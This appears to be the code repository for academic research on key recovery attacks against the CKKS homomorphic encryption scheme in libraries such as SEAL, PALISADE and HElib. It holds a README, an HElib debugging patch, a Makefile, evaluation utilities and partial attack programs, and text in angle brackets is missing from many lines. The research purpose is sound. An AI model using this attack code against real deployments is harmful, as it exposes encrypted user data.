├── .gitignore
├── README.md
├── patches
│   └── 0001-local-debugging-changes.patch
└── src
    ├── Makefile
    ├── attack.cpp
    ├── eval.cpp
    ├── eval.h
    ├── helib_attack.cpp
    ├── helib_utils.cpp
    ├── helib_utils.h
    ├── lattigo
    │   ├── go.mod
    │   └── main.go
    ├── lattigo_new
    │   ├── go.mod
    │   └── main.go
    ├── ntl_utils.cpp
    ├── ntl_utils.h
    ├── palisade.h
    ├── palisade_attack.cpp
    ├── palisade_attack_test.cpp
    ├── palisade_utils.cpp
    ├── palisade_utils.h
    ├── rns_attack.cpp
    ├── seal_attack.cpp
    ├── seal_utils.cpp
    └── seal_utils.h

/.gitignore:
--------------------------------------------------------------------------------
# Prerequisites
*.d

# Compiled Object files
*.slo
*.lo
*.o
*.obj

# Precompiled Headers
*.gch
*.pch

# Compiled Dynamic libraries
*.so
*.dylib
*.dll

# Compiled Static libraries
*.lai
*.la
*.a
*.lib

# Executables
*.exe
*.out
*.app

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Key recovery attacks against the CKKS homomorphic approximate encryption scheme

This repository contains experimental code implementing our key recovery attacks against the CKKS scheme. The current implementations work with the HEAAN, PALISADE, SEAL, HElib, RNS-HEAAN, and Lattigo libraries.

## Build instructions (for all libraries except Lattigo)

The Makefile expects the HEAAN library to be available in the current directory.
Install HEAAN and create a symbolic link to it. For example, if HEAAN is cloned
from GitHub to `/local/HEAAN`, then use this path as ``. HEAAN
depends on NTL, which is assumed to be installed in `/usr/local`.

    ln -s ./
    make attack

Similarly, to build the attack for RNS-HEAAN, install RNS-HEAAN (FullRNS-HEAAN)
and create a symbolic link to it in the current directory.
The Makefile expects the library
files (.a or .so) to be under `./FullRNS-HEAAN/lib`.

    ln -s ./
    make rns_attack

For PALISADE, SEAL, and HElib, the Makefile expects their default installations
under `/usr/local`. Otherwise, modify the variables `PALISADE`, `_INCLUDE`,
and `_LIBS` (`X` being `SEAL` or `HELIB`) in the Makefile to point to the root include
directory and the library directory. These programs also depend on NTL (installed
under `/usr/local` or `/usr`). Then build the executables as:

    make palisade_attack seal_attack helib_attack

Whenever possible, prefer an optimized build (e.g., `-O3`) with parallelization
enabled for better running times.

## Special note for HElib

HElib's `Ctxt` class does not provide a public interface for accessing the
component Double-CRT polynomials ("parts" in HElib's terminology). We include
a patch (`patches/0001-local-debugging-changes.patch`) that adds an accessor function `getPart()`
to `Ctxt`, a global variable `helib::decrypted_ptxt_` that stores the decrypted
polynomial (for checking the encoding error), and an overload of `CKKS_embedInSlots`
that encodes into `NTL::ZZX` to avoid integer overflow.

## How to run the experiment programs

In general, all programs expect command-line arguments specifying the type of
homomorphic computation ``, the ring dimension ``, the initial scaling
factor ``, the upper bound on the random plaintext numbers ``, and the
maximal polynomial degree to evaluate ``. The homomorphic computation
argument `` can be one of the following:

    noop, variance, sigmoid, exp

The order of the arguments differs slightly between programs because these
libraries set up their parameters differently.
Here are the details:

For HEAAN, run the attack program as:

    ./attack
    # logN is hard coded in HEAAN's Params.h
    # is the number of runs to execute, for example, 1

For PALISADE, run palisade_attack as:

    ./palisade_attack

For SEAL, run seal_attack as:

    ./seal_attack

For HElib, run helib_attack as:

    ./helib_attack

For RNS-HEAAN, run rns_attack as:

    ./rns_attack
    # L is the maximal level of computation, for example, 10

For all programs, the parameter `` is ignored when `` is noop or variance.
These programs check and print the encoding error, and at the end of a run they
report whether the secret key was successfully recovered.
For HEAAN, since a power-of-2 modulus is used, the `a` part of a ciphertext is
non-invertible with some probability; in that case, the encoding error indicates
whether Gaussian elimination can be used after collecting a few more ciphertexts.

## How to build and run the attack program with Lattigo

Lattigo is written in Go and uses a different programming environment, so building
and running the attack program differs slightly from the other libraries. The source
code of the Lattigo version of our attack program is under `src/lattigo`, and it is
compatible with Lattigo v2.0.0. To build and run it, first retrieve the Lattigo source
tree from https://github.com/ldsec/lattigo and check out version v2.0.0:

    git checkout -b v2.0.0 tags/v2.0.0

Then modify `go.mod` under `src/lattigo` by replacing "/scratch/lattigo" with the path
to the Lattigo source tree on your computer. Now we are ready to build the attack program:

    cd src/lattigo
    go build

This should build an executable `ckks_attack`. To run it, simply execute `./ckks_attack`.

Lattigo implemented some mitigation strategies in the branch `dev_indCPA+_mitigation`,
which is based on the API of version v2.1.0. A modified attack program compatible with
this branch can be found in `src/lattigo_new`, and it can be built in a similar way.
Note that the parameters to `encoder.DecodeAndRound` should be chosen carefully for the mitigation to work.

--------------------------------------------------------------------------------
/patches/0001-local-debugging-changes.patch:
--------------------------------------------------------------------------------
1 | From a1ec3e984dbcc2ec600521ff004da4ae70a8c8ec Mon Sep 17 00:00:00 2001 2 | From: a@a.com 3 | Date: Mon, 14 Sep 2020 00:03:01 -0700 4 | Subject: [PATCH] local debugging changes 5 | 6 | --- 7 | include/helib/Ctxt.h | 2 ++ 8 | include/helib/keys.h | 2 ++ 9 | include/helib/norms.h | 6 ++++++ 10 | src/Makefile | 2 +- 11 | src/keys.cpp | 8 ++++++- 12 | src/norms.cpp | 50 ++++++++++++++++++++++++++++++++++++++++--- 13 | 6 files changed, 65 insertions(+), 5 deletions(-) 14 | 15 | diff --git a/include/helib/Ctxt.h b/include/helib/Ctxt.h 16 | index dcd70fa..ce1f7cf 100644 17 | --- a/include/helib/Ctxt.h 18 | +++ b/include/helib/Ctxt.h 19 | @@ -400,6 +400,8 @@ public: 20 | return privateAssign(other); 21 | } 22 | 23 | + CtxtPart const& getPart(size_t i) const { return parts[i]; } 24 | + 25 | bool operator==(const Ctxt& other) const { return equalsTo(other); } 26 | bool operator!=(const Ctxt& other) const { return !equalsTo(other); } 27 | 28 | diff --git a/include/helib/keys.h b/include/helib/keys.h 29 | index 64dd8a6..1686e47 100644 30 | --- a/include/helib/keys.h 31 | +++ b/include/helib/keys.h 32 | @@ -322,6 +322,8 @@ double RLWE(DoubleCRT& c0, 33 | //!
Same as RLWE, but assumes that c1 is already chosen by the caller 34 | double RLWE1(DoubleCRT& c0, const DoubleCRT& c1, const DoubleCRT& s, long p); 35 | 36 | +extern NTL::ZZX decrypted_ptxt_; 37 | + 38 | } // namespace helib 39 | 40 | #endif // HELIB_KEYS_H 41 | diff --git a/include/helib/norms.h b/include/helib/norms.h 42 | index 3c367e9..e490f5f 100644 43 | --- a/include/helib/norms.h 44 | +++ b/include/helib/norms.h 45 | @@ -123,6 +123,12 @@ void CKKS_embedInSlots(zzX& f, 46 | const PAlgebra& palg, 47 | double scaling); 48 | 49 | +//! Encode into ZZX to avoid integer overflow 50 | +void CKKS_embedInSlots(NTL::ZZX& f, 51 | + const std::vector& v, 52 | + const PAlgebra& palg, 53 | + double scaling); 54 | + 55 | } // namespace helib 56 | 57 | #endif // ifndef HELIB_NORMS_H 58 | diff --git a/src/Makefile b/src/Makefile 59 | index d9e20cd..200e2aa 100644 60 | --- a/src/Makefile 61 | +++ b/src/Makefile 62 | @@ -16,7 +16,7 @@ AR = ar 63 | ARFLAGS=rv 64 | GMP=-lgmp 65 | NTL=-lntl 66 | -COPT=-g -O2 -march=native 67 | +COPT=-g -O3 -march=native 68 | INC_HELIB=-I../include/ 69 | LEGACY_TESTS=../misc/legacy_tests/ 70 | 71 | diff --git a/src/keys.cpp b/src/keys.cpp 72 | index 4e5910b..aa20f39 100644 73 | --- a/src/keys.cpp 74 | +++ b/src/keys.cpp 75 | @@ -21,7 +21,7 @@ 76 | #include 77 | #include 78 | #include 79 | - 80 | +#include 81 | namespace helib { 82 | 83 | /******** Utility function to generate RLWE instances *********/ 84 | @@ -1109,6 +1109,10 @@ void SecKey::Decrypt(NTL::ZZX& plaintxt, 85 | 86 | f = plaintxt; // f used only for debugging 87 | 88 | + 89 | + decrypted_ptxt_ = plaintxt; 90 | + 91 | + 92 | if (isCKKS()) 93 | return; // CKKS encryption, nothing else to do 94 | // NOTE: calling application must still divide by ratFactor after decoding 95 | @@ -1345,4 +1349,6 @@ void readSecKeyBinary(std::istream& str, SecKey& sk) 96 | assertEq(eyeCatcherFound, 0, "Could not find post-secret key eyecatcher"); 97 | } 98 | 99 | +NTL::ZZX decrypted_ptxt_; 100 | + 101 | } // 
namespace helib 102 | diff --git a/src/norms.cpp b/src/norms.cpp 103 | index ca7f0ff..7aac2d7 100644 104 | --- a/src/norms.cpp 105 | +++ b/src/norms.cpp 106 | @@ -22,7 +22,7 @@ 107 | #include 108 | #include 109 | #include 110 | - 111 | +#include 112 | namespace helib { 113 | 114 | #define USE_HALF_FFT (1) 115 | @@ -603,12 +603,56 @@ void CKKS_embedInSlots(zzX& f, 116 | 117 | hfft.fft.apply(&buf[0]); 118 | f.SetLength(m / 2); 119 | - for (long i : range(m / 2)) 120 | - f[i] = std::round(MUL(buf[i], pow[i]).real() * scaling); 121 | + for (long i : range(m / 2)) { 122 | + double fi = std::round(MUL(buf[i], pow[i]).real() * scaling); 123 | + if (fi > std::pow(2,63) || fi < std::pow(2,63)*(-1)) { 124 | + Warning("overflow in converting to zzX"); 125 | + } 126 | + f[i] = fi; 127 | + } 128 | 129 | normalize(f); 130 | } 131 | 132 | + 133 | +void CKKS_embedInSlots(NTL::ZZX& f, 134 | + const std::vector& v, 135 | + const PAlgebra& palg, 136 | + double scaling) 137 | + 138 | +{ 139 | + long v_sz = v.size(); 140 | + long m = palg.getM(); 141 | + 142 | + if (!(palg.getP() == -1 && palg.getPow2() >= 2)) 143 | + throw LogicError("bad args to CKKS_canonicalEmbedding"); 144 | + 145 | + std::vector buf(m / 2, cx_double(0)); 146 | + for (long i : range(m / 4)) { 147 | + long j = palg.ith_rep(i); 148 | + long ii = m / 4 - i - 1; 149 | + if (ii < v_sz) { 150 | + buf[j >> 1] = std::conj(v[ii]); 151 | + buf[(m - j) >> 1] = v[ii]; 152 | + } 153 | + } 154 | + 155 | + const half_FFT& hfft = palg.getHalfFFTInfo(); 156 | + const cx_double* pow = &hfft.pow[0]; 157 | + 158 | + scaling /= (m / 2); 159 | + // This is becuase DFT^{-1} = 1/(m/2) times a DFT matrix for conj(V) 160 | + 161 | + hfft.fft.apply(&buf[0]); 162 | + f.SetLength(m / 2); 163 | + for (long i : range(m / 2)) { 164 | + double fi = std::round(MUL(buf[i], pow[i]).real() * scaling); 165 | + f[i] = NTL::to_ZZ(fi); 166 | + } 167 | + 168 | + f.normalize(); 169 | +} 170 | + 171 | // === obsolete versions of canonical embedding and 
inverse === 172 | 173 | // These are less efficient, and seem to have some logic errors. 174 | -- 175 | 2.17.1 176 | 177 | -------------------------------------------------------------------------------- /src/Makefile: -------------------------------------------------------------------------------- 1 | HEAAN=./HEAAN/HEAAN 2 | HEAAN_LIBS=-L$(HEAAN)/lib -lHEAAN -Wl,-rpath=$(HEAAN)/lib -lntl -Wl,-rpath=/usr/local/lib -lgmp -lm 3 | HEAAN_INCLUDE=-I$(HEAAN)/src 4 | 5 | FRNSHEAAN=./FullRNS-HEAAN 6 | FRNSHEAAN_LIBS=-L$(FRNSHEAAN)/lib -lFRNSHEAAN -Wl,-rpath=$(FRNSHEAAN)/lib -lntl -Wl,-rpath=/usr/local/lib -lgmp -lm 7 | FRNSHEAAN_INCLUDE=-I$(FRNSHEAAN)/src 8 | 9 | PALISADE=/usr/local/include/palisade 10 | PALISADE_INCLUDE=-I$(PALISADE) -I$(PALISADE)/core -I$(PALISADE)/pke 11 | PALISADE_LIBS=-L/usr/local/lib -lPALISADEcore -lPALISADEpke -Wl,-rpath=/usr/local/lib -lntl 12 | 13 | SEAL_INCLUDE=-I/usr/local/include/SEAL-3.5 14 | SEAL_LIBS=-L/usr/local/lib -lseal-3.5 -lz -Wl,-rpath=/usr/local/lib -lntl 15 | 16 | HELIB_INCLUDE=-I/usr/local/include 17 | HELIB_LIBS=-Wl,-rpath=/usr/local/lib -L/usr/local/lib -lhelib -lntl -lgmp 18 | 19 | all: attack palisade_attack seal_attack helib_attack 20 | 21 | attack: attack.cpp eval.h eval.cpp ntl_utils.h ntl_utils.cpp 22 | g++ attack.cpp eval.cpp ntl_utils.cpp -o attack -std=c++11 -O3 -pthread $(HEAAN_LIBS) $(HEAAN_INCLUDE) 23 | 24 | rns_attack: rns_attack.cpp eval.h eval.cpp ntl_utils.h ntl_utils.cpp 25 | g++ rns_attack.cpp eval.cpp ntl_utils.cpp -o rns_attack -std=c++11 -fopenmp -O3 -pthread $(FRNSHEAAN_LIBS) $(FRNSHEAAN_INCLUDE) 26 | 27 | palisade_attack: palisade_attack.cpp palisade_utils.cpp eval.h eval.cpp 28 | g++ palisade_attack.cpp palisade_utils.cpp eval.cpp -o palisade_attack -std=c++11 -O3 $(PALISADE_LIBS) $(PALISADE_INCLUDE) 29 | 30 | seal_attack: seal_attack.cpp eval.h eval.cpp seal_utils.h seal_utils.cpp 31 | g++ seal_attack.cpp seal_utils.cpp eval.cpp -o seal_attack -std=c++17 -fopenmp -O3 -pthread $(SEAL_LIBS) $(SEAL_INCLUDE) 
32 | 33 | helib_attack: helib_attack.cpp helib_utils.h helib_utils.cpp ntl_utils.h ntl_utils.cpp eval.h eval.cpp 34 | g++ helib_attack.cpp helib_utils.cpp ntl_utils.cpp eval.cpp -o helib_attack -std=c++14 -O3 -pthread $(HELIB_LIBS) $(HELIB_INCLUDE) 35 | 36 | clean: 37 | rm -f attack rns_attack palisade_attack seal_attack helib_attack 38 | 39 | .PHONY: all clean 40 | 41 | -------------------------------------------------------------------------------- /src/attack.cpp: -------------------------------------------------------------------------------- 1 | #include "HEAAN.h" 2 | #include "StringUtils.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "eval.h" 10 | #include "ntl_utils.h" 11 | 12 | using namespace std; 13 | using namespace NTL; 14 | 15 | // Convert vector of integers to NTL polynomial 16 | void NTLpolyQ(ZZ_pE & pX, const ZZ* vecZ, const int n) { 17 | ZZX zX; 18 | for (int i=0; i(conv(zX)); 22 | } 23 | 24 | #define Conv2toZ(p) (conv(conv(p))) 25 | #define ConvZtoQ(p) (conv(conv(p))) 26 | #define Conv2toQ(p) (ConvZtoQ(Conv2toZ(p))) 27 | #define ConvQtoZ(q) (conv(conv(q))) 28 | #define ConvZto2(q) (conv(conv(q))) 29 | #define ConvQto2(q) (ConvZto2(ConvQtoZ(q))) 30 | #define ConvQto2X(q) (conv(ConvQtoZ(q))) 31 | 32 | // Compute the L-infty norm of aX - bX 33 | ZZ maxDiff(ZZ const* aX, ZZ const* bX, int n, ZZ const& modQ) { 34 | ZZ m = ZZ::zero(); 35 | ZZ hQ = modQ / 2; 36 | for (int i=0; i= hQ) { 39 | d = d - modQ; 40 | } 41 | d = abs(d); 42 | if (m *val_input = randomComplexVector(n, ptBound); // use all slots 80 | 81 | // Key generation 82 | SecretKey secretKey(ring); 83 | Scheme scheme(secretKey, ring); 84 | 85 | if (hc == HC_VARIANCE) { 86 | // Add rotation keys when computing variance 87 | for (int i=1; i<=n/2; i*=2) { 88 | scheme.addLeftRotKey(secretKey, i); // for left shift 1< 3 | #include 4 | 5 | #include 6 | #include 7 | 8 | void evalPlainAdd(std::vector & res, 9 | std::vector const& in0, std::vector const& in1) { 10 |
size_t len = std::min(in0.size(), in1.size()); 11 | res.resize(len); 12 | for (size_t i = 0; i < len; i++) { 13 | res[i] = in0[i] + in1[i]; 14 | } 15 | } 16 | 17 | 18 | void evalPlainMul(std::vector & res, 19 | std::vector const& in0, std::vector const& in1) { 20 | size_t len = std::min(in0.size(), in1.size()); 21 | res.resize(len); 22 | for (size_t i = 0; i < len; i++) { 23 | res[i] = in0[i] * in1[i]; 24 | } 25 | } 26 | 27 | void evalPlainNegate(std::vector & res, std::vector const& in) { 28 | size_t len = in.size(); 29 | res.resize(len); 30 | for (size_t i = 0; i < len; i++) { 31 | res[i] = -in[i]; 32 | } 33 | } 34 | 35 | void evalPlainInverse(std::vector & res, std::vector const& in) { 36 | size_t len = in.size(); 37 | res.resize(len); 38 | for (size_t i = 0; i < len; i++) { 39 | res[i] = 1.0 / in[i]; 40 | } 41 | } 42 | 43 | void evalPlainPowerOf2(std::vector & res, std::vector const& in, size_t logDeg) { 44 | res = in; // copy all the numbers 45 | for (size_t j = 0; j < logDeg; j++) { 46 | for (size_t i = 0; i < in.size(); i++) { 47 | res[i] = res[i] * res[i]; 48 | } 49 | } 50 | } 51 | 52 | void evalPlainPower(std::vector & res, std::vector const& in, size_t deg) { 53 | size_t logDeg = (size_t)floor(std::log2((double)deg)); 54 | size_t remDeg = deg - (1 << logDeg); 55 | evalPlainPowerOf2(res, in, logDeg); 56 | if (remDeg > 0) { 57 | std::vector tmp(in.size()); 58 | evalPlainPower(tmp, in, remDeg); 59 | evalPlainMul(res, res, tmp); 60 | } 61 | } 62 | 63 | void evalPlainAddi(std::vector & res, std::vector const& in, double c) { 64 | res.resize(in.size()); 65 | for (size_t i = 0; i < in.size(); i++) { 66 | res[i] = in[i] + c; 67 | } 68 | } 69 | 70 | void evalPlainMuli(std::vector & res, std::vector const& in, double c) { 71 | res.resize(in.size()); 72 | for (size_t i = 0; i < in.size(); i++) { 73 | res[i] = in[i] * c; 74 | } 75 | } 76 | 77 | std::map> 78 | SpecialFunction::coeffsOf = { 79 | { FuncName::LOG, {0,1,-0.5,1./3,-1./4,1./5,-1./6,1./7,-1./8,1./9,-1./10} 
}, 80 | { FuncName::EXP, {1,1,0.5,1./6,1./24,1./120,1./720,1./5040,1./40320,1./362880,1./3628800 } }, 81 | { FuncName::SIGMOID, {1./2,1./4,0,-1./48,0,1./480,0,-17./80640,0,31./1451520,0} } 82 | }; 83 | 84 | 85 | void evalPlainFunc(std::vector & res, std::vector const& in, std::vector const& coeff, int evDeg) { 86 | res.resize(in.size(), 0); 87 | res = in; // x 88 | 89 | evalPlainMuli(res, res, coeff[1]); // c_1 x 90 | evalPlainAddi(res, res, coeff[0]); // c_1 x + c_0 91 | 92 | const int deg = (evDeg == -1 || evDeg > (int)coeff.size() - 1) ? (int)coeff.size() - 1 : evDeg; // clamp to the available coefficients, as helib_attack.cpp does 93 | const int logDeg = (int)floor(std::log2(deg)); 94 | std::vector> basis(logDeg+1); // x^(2^i) for i=0..logDeg 95 | basis[0] = in; // x^(2^0) 96 | for (int j = 0, i = 1; j < logDeg; j++, i++) { 97 | evalPlainPowerOf2(basis[i], in, i); // x^(2^i) 98 | } 99 | 100 | for (int i = 2; i <= deg; i++) { 101 | int k = floor(std::log2(i)); 102 | int r = i - (1 << k); 103 | std::vector tmp = basis[k]; // x^(2^k) 104 | while (r > 0) { 105 | k = floor(std::log2(r)); 106 | r = r - (1 << k); 107 | evalPlainMul(tmp, tmp, basis[k]); 108 | } 109 | evalPlainMuli(tmp, tmp, coeff[i]); // c_i * x^i 110 | evalPlainAdd(res, res, tmp); 111 | } 112 | } 113 | 114 | void evalPlainFunc(std::vector & res, std::vector const& in, SpecialFunction::FuncName name, int evDeg) { 115 | std::vector const& coeff = SpecialFunction::coeffsOf[name]; 116 | evalPlainFunc(res, in, coeff, evDeg); 117 | } 118 | 119 | void evalPlainFunc(std::vector & res, cx_double * in, size_t len, SpecialFunction::FuncName name, int evDeg) { 120 | std::vector vin(in, in+len); 121 | evalPlainFunc(res, vin, name, evDeg); 122 | } 123 | 124 | double largestElm(std::vector> const& vec) { 125 | double m = 0; 126 | for (auto& x : vec) { 127 | if (m < std::abs(x.real())) 128 | m = std::abs(x.real()); 129 | if (m < std::abs(x.imag())) 130 | m = std::abs(x.imag()); 131 | } 132 | return m; 133 | } 134 
| 135 | void evalPlainVariance(std::vector & res, std::vector const& in) { 136 | evalPlainMul(res, in, in);
137 | cx_double sum = 0; 138 | for (auto const& x : res) { 139 | sum += x; 140 | } 141 | for (size_t i = 0; i < res.size(); i++) { 142 | res[i] = sum/((double)res.size()); 143 | } 144 | } 145 | 146 | double maxDiff(std::vector const& in0, std::vector const& in1) { 147 | size_t len = std::min(in0.size(), in1.size()); 148 | std::vector tmp(len); 149 | evalPlainNegate(tmp, in1); 150 | evalPlainAdd(tmp, in0, tmp); 151 | return largestElm(tmp); 152 | } 153 | 154 | double relError(std::vector const& in0, std::vector const& in1) { 155 | size_t len = std::min(in0.size(), in1.size()); 156 | std::vector diff(len); 157 | evalPlainNegate(diff, in1); 158 | evalPlainAdd(diff, diff, in0); 159 | double res = 0; 160 | for (size_t i = 0; i < len; i++) { 161 | double tmp = std::fabs(diff[i].real() / in1[i].real()); 162 | if (res < tmp) { 163 | res = tmp; 164 | } 165 | tmp = std::fabs(diff[i].imag() / in1[i].imag()); 166 | if (res < tmp) { 167 | res = tmp; 168 | } 169 | } 170 | return res; 171 | } 172 | 173 | void randomComplexVector(std::vector& array, size_t n, double rad) { 174 | if (rad <= 0) { 175 | rad = 1.0; // default radius = 1 176 | } 177 | array.resize(n); // allocate space 178 | for (auto& x : array) { 179 | long bits = NTL::RandomLen_long(32); // 32 random bits 180 | double r = std::sqrt(bits & 0xffff) / 256.0; // sqrt(uniform[0,1]) 181 | double theta = 182 | 2.0L * M_PI * ((bits >> 16) & 0xffff) / 65536.0; // uniform(0,2pi) 183 | x = std::polar(rad * r, theta); 184 | } 185 | } 186 | 187 | cx_double * randomComplexVector(size_t n, double rad) { 188 | std::vector vec(n); 189 | cx_double * pvec = new cx_double[n]; 190 | randomComplexVector(vec, n, rad); 191 | for (size_t i = 0; i < n; i++) { 192 | pvec[i] = vec[i]; 193 | } 194 | return pvec; 195 | } 196 | 197 | void randomRealVector(std::vector& array, size_t n, double B) { 198 | B = fabs(B); 199 | array.resize(n); // allocate space 200 | for (auto& x : array) { 201 | long bits = NTL::RandomLen_long(32); // 32 random bits 
202 | double r = std::sqrt(bits & 0xffff) / 256.0; // sqrt(uniform[0,1]) 203 | double sign = ((bits >> 16) & 0xffff) > 32767 ? 1.0 : -1.0; 204 | x.real(B * r * sign); 205 | x.imag(0); 206 | } 207 | } 208 | cx_double * randomRealVector(size_t n, double rad) { 209 | std::vector vec(n); 210 | cx_double * pvec = new cx_double[n]; 211 | randomRealVector(vec, n, rad); 212 | for (size_t i = 0; i < n; i++) { 213 | pvec[i] = vec[i]; 214 | } 215 | return pvec; 216 | } 217 | 218 | HomomorphicComputation parseHC(char const* v) { 219 | HomomorphicComputation hc = HC_NOOP; // Default noop 220 | if (!v) { 221 | return hc; 222 | } 223 | if (!strcmp(v, "variance")) { 224 | hc = HC_VARIANCE; 225 | } else if(!strcmp(v, "sigmoid")) { 226 | hc = HC_SIGMOID; 227 | } else if(!strcmp(v, "exp")) { 228 | hc = HC_EXP; 229 | } 230 | return hc; 231 | } 232 | 233 | 234 | 235 | 236 | char const* hcString(HomomorphicComputation hc) { 237 | switch (hc) { 238 | case HC_VARIANCE : return "variance"; 239 | case HC_SIGMOID : return "sigmoid"; 240 | case HC_EXP : return "exp"; 241 | default : return "noop"; 242 | } 243 | return "noop"; 244 | } 245 | 246 | void copyTo(std::complex * dst, std::complex const* src, size_t len) { 247 | for (size_t i = 0; i < len; i++) { 248 | dst[i] = src[i]; 249 | } 250 | } 251 | 252 | bool isEqual(std::complex const* m0, std::complex const* m1, size_t len) { 253 | for (size_t i = 0; i < len; i++) { 254 | if (m0[i] != m1[i]) { 255 | std::cout.precision(10); 256 | std::cout << "different @ " << i << " : " 257 | << std::scientific << m0[i] << ", " << m1[i] << std::endl; 258 | return false; 259 | } 260 | } 261 | return true; 262 | } 263 | -------------------------------------------------------------------------------- /src/eval.h: -------------------------------------------------------------------------------- 1 | #ifndef EVAL_H 2 | #define EVAL_H 3 | // Evaluation of functions on plaintext numbers 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | enum HomomorphicComputation 
{ 10 | HC_NOOP, 11 | HC_VARIANCE, 12 | HC_SIGMOID, 13 | HC_EXP 14 | }; 15 | char const* hcString(HomomorphicComputation hc); 16 | HomomorphicComputation parseHC(char const* v); 17 | 18 | typedef std::complex cx_double; 19 | 20 | void evalPlainNegate(std::vector & res, std::vector const& in); 21 | void evalPlainInverse(std::vector & res, std::vector const& in); 22 | 23 | void evalPlainAdd(std::vector & res, 24 | std::vector const& in0, std::vector const& in1); 25 | void evalPlainMul(std::vector & res, 26 | std::vector const& in0, std::vector const& in1); 27 | 28 | void evalPlainPowerOf2(std::vector & res, std::vector const& in, size_t logDeg); 29 | void evalPlainPower(std::vector & res, std::vector const& in, size_t deg); 30 | 31 | void evalPlainAddi(std::vector & res, std::vector const& in, double c); 32 | void evalPlainMuli(std::vector & res, std::vector const& in, double c); 33 | 34 | struct SpecialFunction { 35 | enum FuncName { 36 | LOG, 37 | EXP, 38 | SIGMOID 39 | }; 40 | static std::map> coeffsOf; 41 | // each coefficient vector is indexed from 0, where the entry at index i is the 42 | // coefficient of X^i 43 | }; 44 | 45 | void evalPlainFunc(std::vector & res, std::vector const& in, std::vector const& coeff, int deg = -1); 46 | void evalPlainFunc(std::vector & res, std::vector const& in, SpecialFunction::FuncName name, int deg = -1); 47 | void evalPlainFunc(std::vector & res, cx_double * in, size_t len, SpecialFunction::FuncName name, int deg = -1); 48 | 49 | double largestElm(std::vector const& vec); 50 | double maxDiff(std::vector const& in0, std::vector const& in1); 51 | double relError(std::vector const& in0, std::vector const& in1); 52 | 53 | void evalPlainVariance(std::vector & res, std::vector const& in); 54 | 55 | void randomComplexVector(std::vector& array, size_t n, double rad = 1.0); 56 | cx_double * randomComplexVector(size_t n, double rad = 1.0); 57 | void randomRealVector(std::vector& array, size_t n, double B = 1.0); 58 | cx_double * 
randomRealVector(size_t n, double B = 1.0); 59 | 60 | #endif // EVAL_H 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /src/helib_attack.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | #include "helib_utils.h" 9 | #include "eval.h" 10 | 11 | // Homomorphic computations 12 | helib::Ctxt evalVariance(helib::EncryptedArrayCx const& ea, helib::Ctxt const& ct, size_t n) { 13 | std::cout << "Compute variance" << std::endl; 14 | 15 | helib::Ctxt ctRes(ct); // copy x 16 | ctRes.multiplyBy(ct); // x^2 17 | ctRes.dropSmallAndSpecialPrimes(); // drop moduli p_i added in modUp 18 | for (int i=2; i<=n; i*=2) { 19 | helib::Ctxt tmp(ctRes); 20 | ea.rotate(tmp, n/i); // tmp = ctRes >> n/i 21 | tmp.dropSmallAndSpecialPrimes(); // drop moduli p_i added in modUp 22 | 23 | showCtxtScale(tmp, "rotate "); 24 | ctRes += tmp; 25 | } 26 | ctRes.multByConstantCKKS(1/(double)n); 27 | return ctRes; 28 | } 29 | 30 | // ctRes[i] = encryption of x^(2^i), where ct = encryption of x, for 0 <= i <= logDeg 31 | void evalPowerOf2(std::vector & ctRes, helib::Ctxt const& ct, int logDeg) { 32 | ctRes.resize(logDeg+1); 33 | ctRes[0] = new helib::Ctxt(ct); // x^(2^0) 34 | for (int i = 1; i <= logDeg; i++) { 35 | ctRes[i] = new helib::Ctxt(*ctRes[i-1]); // x^(2^{i-1}) 36 | ctRes[i]->multiplyBy(*ctRes[i-1]); // x^(2^i) 37 | ctRes[i]->dropSmallAndSpecialPrimes(); 38 | showCtxtScale(*ctRes[i], "powerOf2 "); 39 | } 40 | } 41 | 42 | // A workaround for multiplying by a constant c, where helib would hit a division by 0 error if c<0 43 | void multByConstantCKKSFix(helib::Ctxt & ct, double c) { 44 | if (c<0) { 45 | ct.multByConstantCKKS(-c); 46 | ct.negate(); 47 | } else { 48 | ct.multByConstantCKKS(c); 49 | } 50 | } 51 | 52 | 53 | // Evaluate a polynomial function up to degree evalDeg 54 | helib::Ctxt evalFunction(helib::Ctxt 
const& ct, size_t n, 55 | std::vector const& coeff, int evalDeg = -1) { 56 | int deg = evalDeg == -1 ? coeff.size()-1 : std::min((size_t)evalDeg, coeff.size() - 1); // assume coeff is not empty 57 | int logDeg = std::floor(std::log2((double)deg)); 58 | std::cout << "evalFunction " << coeff << " to degree " << deg << std::endl; 59 | std::vector ctPow2s(logDeg+1); 60 | evalPowerOf2(ctPow2s, ct, logDeg); 61 | helib::Ctxt ctRes(ct); // copy x 62 | multByConstantCKKSFix(ctRes, coeff[1]); // c_1 * x 63 | ctRes.addConstantCKKS(coeff[0]); // c_1 * x + c_0 64 | showCtxtScale(ctRes, "c_1 * x + c_0 "); 65 | 66 | for (int i = 2; i <= deg; i++) { 67 | if (fabs(coeff[i]) < 1e-27) { 68 | continue; // Too small, skip this term 69 | } 70 | int k = std::floor(std::log2((double)i)); 71 | int r = i - (1 << k); // i = 2^k + r 72 | helib::Ctxt tmp(*ctPow2s[k]); // x^(2^k) 73 | while (r > 0) { 74 | k = std::floor(std::log2((double)r)); 75 | r = r - (1 << k); 76 | tmp.multiplyBy(*ctPow2s[k]); 77 | tmp.dropSmallAndSpecialPrimes(); 78 | } 79 | multByConstantCKKSFix(tmp, coeff[i]); // c_i * x^i 80 | showCtxtScale(tmp, "c_i * x^i "); 81 | ctRes += tmp; 82 | showCtxtScale(ctRes, "add c_i * x^i "); 83 | } 84 | 85 | for (auto &x : ctPow2s) { 86 | delete x; 87 | } 88 | return ctRes; 89 | } 90 | 91 | void test(int logm, int logp, int logQ, double B, int evalDeg, HomomorphicComputation hc) { 92 | // B is the radius of plaintext numbers 93 | long m = pow(2,logm); // Zm* 94 | long r = logp; // bit precision 95 | long L = logQ; // Number of bits of Q 96 | 97 | // Setup the context 98 | helib::Context context(m, -1, r); // p = -1 => complex field, ie m = p-1 99 | 100 | // context.scale = 10; // used for sampling error bound 101 | helib::buildModChain(context, L, /*c=*/2); // 2 columns in key switching key 102 | helib::SecKey secretKey(context); 103 | secretKey.GenSecKey(); 104 | 105 | if (hc == HC_VARIANCE) { 106 | helib::addSome1DMatrices(secretKey); // add rotation keys for variance computation 107 | 
